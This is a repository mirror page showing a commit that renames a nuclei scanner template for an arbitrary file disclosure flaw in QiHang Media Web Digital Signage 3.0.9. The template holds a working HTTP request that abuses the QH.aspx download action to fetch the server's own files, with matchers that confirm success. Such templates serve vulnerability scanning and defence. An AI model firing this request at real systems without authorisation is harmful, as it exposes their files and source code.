daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update and rename qihang-media-web-lfi.yaml to qihang-media-lfi.yaml

patch-1
Prince Chaddha 2021-10-01 16:28:20 +05:30 committed by GitHub
parent ea71661d79
commit 58fd372498
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
vulnerabilities/other/qihang-media-web-lfi.yaml → vulnerabilities/other/qihang-media-lfi.yaml
View File

@ -1,4 +1,4 @@
id: qihang-media-web-lfi
id: qihang-media-lfi
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
@ -13,16 +13,13 @@ requests:
- |
GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "attachment"
- "filename=QH.aspx"
- "application/zip"
part: header
condition: and